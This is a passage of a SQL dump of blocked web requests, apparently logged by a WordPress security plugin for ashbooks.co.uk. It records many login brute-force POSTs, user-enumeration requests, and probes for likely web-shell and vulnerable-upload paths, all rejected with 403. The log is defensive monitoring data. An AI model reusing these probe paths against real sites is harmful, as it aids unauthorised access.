Firefox\\/62.0\"}','47cf6lqDItJOei95E2kmLz3d',0,1638435580.5792,165,'','POST',403,0,600,0,1,'',0),('139.196.88.192',2344900800,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','Fsh2zqAt9j3UEVYLSGpaWuQw',0,1638436175.8981,408,'','POST',403,0,600,0,1,'',0),('104.236.45.171',1760308651,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','XvK5P6aoBFnqcZGSAzs8Dekh',0,1638436746.5294,1919,'','POST',403,0,600,0,1,'',0),('5.101.157.216',90545624,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','VokOJE7wNDFZjdWYlaUC1v5T',0,1638437412.1938,483,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','1ElhC2XqGuUOjIHowKs4pAJe',0,1638437487.0826,725,'','POST',403,0,600,0,1,'',0),('175.208.204.100',2949696612,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','1WPrpL79SQB4bDFsOgcVtN2v',0,1638437987.9637,465,'','POST',403,0,600,0,1,'',0),('103.110.84.33',1735283745,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','7XhYZ1wR9J8iIlKe2DTzcmQP',0,1638438616.4413,500,'','POST',403,0,600,0,1,'',0),('162.214.229.147',2731992467,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','cv9RH5Os8F6oj4E7IyKd2x1A',0,1638439255.7522,183,'','POST',403,0,600,0,1,'',0),('128.199.120.41',2160556073,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','jhBoF2rYGkPVCsQwxDIAdep9',0,1638439808.9968,518,'','POST',403,0,600,0,1,'',0),('185.61.153.71',3107821895,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','tpHxBGK2w37T0RWhsSaOkueA',0,1638440457.8328,163,'','POST',403,0,600,0,1,'',0),('161.35.106.236',2703452908,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','oF4ZsvG0dP5ewrDM8y9uQSYW',0,1638441066.1633,1501,'','POST',403,0,600,0,1,'',0),('193.189.75.222',3250408414,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','ZiMDh4EWGUmVNBl3nXzq8LRx',0,1638441766.6056,155,'','POST',403,0,600,0,1,'',0),('103.233.2.147',1743323795,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','HOkX7nGCBr0tgvQ4jPlFxzMm',0,1638442403.7251,438,'','POST',403,0,600,0,1,'',0),('107.150.57.35',1805007139,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','0c5uayBbgMn2HKNjZpxYLGTO',0,1638442786.7040,163,'','POST',403,0,600,0,1,'',0),('143.110.157.74',2406391114,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','5BsDFWGCZYak8PXIhr7jQxJL',0,1638442971.1198,423,'','POST',403,0,600,0,1,'',0),('185.103.199.252',3110586364,'','https://ashbooks.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','k6twgODvT7J8dfQHxN91Wm0o',0,1638443110.2969,588,'','GET',403,0,700,0,1,'',0),('185.103.199.196',3110586308,'','https://ashbooks.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','kjhleHDLPSaXR05ti3rvQfZN',0,1638443111.5735,640,'','GET',403,0,700,0,1,'',0),('185.103.199.195',3110586307,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','v0WuzfImgqSNs9TRMJnYoBL7',0,1638443112.4575,149,'','GET',403,0,700,0,1,'',0),('185.103.199.251',3110586363,'','https://ashbooks.co.uk/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','vPug4Nf6OC8zTGLEMxcjIXde',0,1638443113.1446,3035,'','GET',403,0,700,0,1,'',0),('185.103.199.253',3110586365,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','ialOpENTfxmQVdnbucHGLy1W',0,1638443116.4762,142,'','GET',403,0,700,0,1,'',0),('185.103.199.119',3110586231,'','https://ashbooks.co.uk/wp-content/themes/sketch/content-sample.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','nlgpcdMUC0jYXL18i9sQN7Aa',0,1638443117.1071,431,'','GET',403,0,700,0,1,'',0),('111.231.82.232',1877431016,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','YiTh4XCFfBLt6Q9gDAsuyWJO',0,1638443651.4130,424,'','POST',403,0,600,0,1,'',0),('103.57.223.190',1731846078,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','WnwAiBxE58OyuqGh9jzV2tT6',0,1638443700.8159,460,'','GET',403,0,520,0,1,'',0),('151.106.55.242',2540320754,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','RLZfuwgy1smPNz6Ki3vYX4jt',0,1638444267.8438,183,'','POST',403,0,600,0,1,'',0),('23.225.177.43',400666923,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','7glzm1jyarRubJ5TqdVoiEXf',0,1638444882.9411,456,'','POST',403,0,600,0,1,'',0),('91.203.111.125',1540059005,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','Tgiq0ps4dmcQyRBjLzNbPHWk',0,1638445451.0035,428,'','POST',403,0,600,0,1,'',0),('167.99.12.57',2808286265,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','dF8OaAeITjz91mHtPMlkvCKY',0,1638446154.4310,156,'','POST',403,0,600,0,1,'',0),('5.63.10.206',88017614,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','wJtMzd0KU3snXcLFilPDNVHb',0,1638446830.1118,427,'','POST',403,0,600,0,1,'',0),('192.99.76.109',3227733101,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','VtlWomTkY1DCsr968wELnyXQ',0,1638447432.1945,434,'','POST',403,0,600,0,1,'',0),('157.245.107.81',2650106705,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','OmRPKktasqirZlLUcTFY4eBb',0,1638448079.8620,197,'','POST',403,0,600,0,1,'',0),('144.126.134.44',2424210988,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','2npmw8EYL3zvfHoR0PgeIW1S',0,1638448745.9886,509,'','POST',403,0,600,0,1,'',0),('182.254.234.148',3070159508,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','moWI2UYpSzf6P8sOinC5g43r',0,1638449388.6136,432,'','POST',403,0,600,0,1,'',0),('150.95.112.79',2522837071,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','FUEjtoAM0d2lpnDHxg8Sr6ks',0,1638450678.9455,764,'','POST',403,0,600,0,1,'',0),('185.70.11.21',3108375317,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','TyL4FMfEhxzRIsY79joP3ZqD',0,1638451338.9185,686,'','POST',403,0,600,0,1,'',0),('110.173.132.17',1856865297,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','zoINnkR1txWT0S2vJ3aipK9D',0,1638452635.5027,461,'','POST',403,0,600,0,1,'',0),('64.227.78.130',1088638594,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','sCApTjFhivG8dDRSwgaY7nyH',0,1638453240.9563,451,'','POST',403,0,600,0,1,'',0),('142.93.253.189',2388524477,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','pdlrD5vu1akW4jKHfEnBSNcP',0,1638453971.6878,206,'','POST',403,0,600,0,1,'',0),('82.202.172.247',1389014263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','C0pitA4Ro81bdkJvQ7YTzGVP',0,1638454739.4765,641,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/wp-content/plugins/whatsmyrank-devenc/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','rkQ32O5PcAMt0U4esVESzDK7',0,1638455327.2222,590,'','GET',403,0,700,0,1,'',0),('35.241.123.16',603028240,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','37FAUmVhbTukMZgtfwnjsL9B',0,1638455444.0217,782,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','RnlwipHr1KETgkMZtvzmbNj8',0,1638455697.0766,522,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','oQ3h9zVgy1nuq2LdG0DUepOC',0,1638456135.5560,631,'','POST',403,0,600,0,1,'',0),('208.109.54.127',3496818303,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','KgbHAI0jfTOm5Z3EnzaMYx4q',0,1638457517.1014,621,'','POST',403,0,600,0,1,'',0),('185.126.219.43',3112098603,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','Cl9sgPZrStQYzoOMEUpLjqvN',0,1638458177.8966,593,'','POST',403,0,600,0,1,'',0),('42.193.21.177',717297073,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','6oJypTUEglfsOh7xebFPY8Kd',0,1638458837.7001,479,'','POST',403,0,600,0,1,'',0),('81.88.52.26',1364735002,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','K8zjLyUrbQpPR2YmHONwWIM1',0,1638459473.2630,183,'','POST',403,0,600,0,1,'',0),('173.212.246.160',2916415136,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','4LJAZlREQYWNCsokwcqptzKS',0,1638460117.4985,661,'','POST',403,0,600,0,1,'',0),('176.31.0.242',2954821874,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','4kX9izJCNarpyI856u1FQDl7',0,1638460763.9889,922,'','POST',403,0,600,0,1,'',0),('138.68.248.47',2319775791,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','GVfL2UAQEtpBkv94MKaRcDHI',0,1638461425.4379,724,'','POST',403,0,600,0,1,'',0),('69.163.232.79',1168369743,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','MOltKaUoszHuZEhIjWvgLBN8',0,1638462077.7675,715,'','POST',403,0,600,0,1,'',0),('161.35.15.239',2703429615,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','u8POodj3Ss7bg5eZJyV1hGvw',0,1638462725.0447,1071,'','POST',403,0,600,0,1,'',0),('188.166.56.218',3165010138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','BbZWAmN3lRgM4c2sPiJqK9Xk',0,1638463370.5840,1100,'','POST',403,0,600,0,1,'',0),('109.87.200.193',1834469569,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','ICEFyBntUDAZb0x5aGmrq1L2',0,1638464016.1634,541,'','POST',403,0,600,0,1,'',0),('109.74.197.132',1833616772,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','LhJXTsuiqCe2ZRO1dQIpnUYk',0,1638464663.8716,538,'','POST',403,0,600,0,1,'',0),('51.195.42.19',868428307,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','iEYRU36f9sOP27kVtpLNdHnv',0,1638465315.7917,621,'','POST',403,0,600,0,1,'',0),('107.172.219.253',1806490621,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','2Vu10pRlMB58HsbeNQJPADnq',0,1638465965.8335,1182,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','M4aRY5ceGqdXwCusWFBHnAbE',0,1638466613.9286,498,'','POST',403,0,600,0,1,'',0),('93.113.111.54',1567715126,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','paxdN2uRS89z10i4TD5w3qCK',0,1638467264.0757,505,'','POST',403,0,600,0,1,'',0),('64.225.70.87',1088505431,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','f6zLVveZ13OY2WKprbjBtnsX',0,1638467914.7620,541,'','POST',403,0,600,0,1,'',0),('45.40.166.142',757638798,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','wDO78BfpLqPuJ1gtFXQ6jamY',0,1638469216.5964,451,'','POST',403,0,600,0,1,'',0),('65.108.51.66',1097610050,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','aVHu3ICfBGPWtEyv6m4bgRF7',0,1638469874.1650,1848,'','POST',403,0,600,0,1,'',0),('185.2.4.44',3103917100,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','ZmNpzP0VTCJYDKasy71vlrQn',0,1638470529.7113,452,'','POST',403,0,600,0,1,'',0),('109.168.97.89',1839751513,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','lxgSv8tL2G7OQbe3Hmq60W5s',0,1638471184.4260,156,'','POST',403,0,600,0,1,'',0),('173.236.145.137',2917962121,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','FTcMAHaYl5O1n3mIWx4uzCwe',0,1638471840.3449,1306,'','POST',403,0,600,0,1,'',0),('200.170.156.249',3366624505,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','PcGF1qMLma2jJUDZCBRltA9T',0,1638472500.1168,452,'','POST',403,0,600,0,1,'',0),('46.101.100.156',778396828,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','2RueLCfSrbaz4Vn8lci7pwU0',0,1638472663.4740,145,'','GET',403,0,520,0,1,'',0),('46.101.100.156',778396828,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','cWBdeY2s1J6wFQfbG7XlIZiE',0,1638472663.4832,157,'','GET',403,0,520,0,1,'',0),('103.121.89.72',1736005960,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','h6dT7BqISV9swaRijmf8lEOP',0,1638473160.2293,551,'','POST',403,0,600,0,1,'',0),('188.166.56.218',3165010138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','OHF32r9TSXgQD4PmKZvWcwIY',0,1638474495.7996,440,'','POST',403,0,600,0,1,'',0),('138.68.69.48',2319729968,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','7F8nqKdWTlv3EuhcYbBMIeZt',0,1638475168.8823,610,'','POST',403,0,600,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','tdvM32mK8Fk0iJlgjD5N1GTL',0,1638475561.3457,445,'','GET',403,0,700,0,1,'',0),('82.156.109.203',1385983435,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','1QwiGdgfjynbeZo4JXrcm0za',0,1638477210.8382,518,'','POST',403,0,600,0,1,'',0),('95.217.195.206',1608106958,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','GJXEW35Vt0wxORL2Ph7k9sdb',0,1638477886.0937,230,'','POST',403,0,600,0,1,'',0),('64.207.179.129',1087353729,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','kBXWbmiQDxMlScROGoVstUue',0,1638478564.0555,668,'','POST',403,0,600,0,1,'',0),('45.12.32.57',755769401,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','7gEbQ53ftXSlzyZusFJo20xP',0,1638479248.4848,458,'','POST',403,0,600,0,1,'',0),('157.245.217.209',2650134993,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','HeuJ2AxVnK05cQo8143atglE',0,1638479939.7288,610,'','POST',403,0,600,0,1,'',0),('161.35.15.239',2703429615,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','ATgi7KGPFlWnshum9NxIj28C',0,1638481297.9709,471,'','POST',403,0,600,0,1,'',0),('134.209.196.64',2261894208,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','C7vQIRYwdapqm5yo2SDfMGOJ',0,1638482669.1246,504,'','POST',403,0,600,0,1,'',0),('42.193.21.177',717297073,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','APkiUFeB4vx8lYEZSuj6znLr',0,1638483353.4676,419,'','POST',403,0,600,0,1,'',0),('192.185.130.172',3233383084,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','pMrVFEuPOYTlyJgmQHa7wkvf',0,1638484040.2869,570,'','POST',403,0,600,0,1,'',0),('155.94.163.77',2606670669,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','tqPL4eJBOCjDFvXMoYZlaHgc',0,1638484725.3343,424,'','POST',403,0,600,0,1,'',0),('188.166.94.198',3165019846,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','mlNxAXYdoKq9whkvftnirzCQ',0,1638485407.9535,447,'','POST',403,0,600,0,1,'',0),('68.183.108.18',1152871442,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','qJA2kVOcNyKXruLC09afREd3',0,1638486794.0645,547,'','POST',403,0,600,0,1,'',0),('176.31.0.242',2954821874,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','DCFKWxmsSEtJypIiZUh40fNR',0,1638487488.2786,539,'','POST',403,0,600,0,1,'',0),('81.88.52.26',1364735002,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','cFQT4NVDE5AKjYfzGCXm8BU1',0,1638488177.3960,687,'','POST',403,0,600,0,1,'',0),('109.87.200.193',1834469569,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 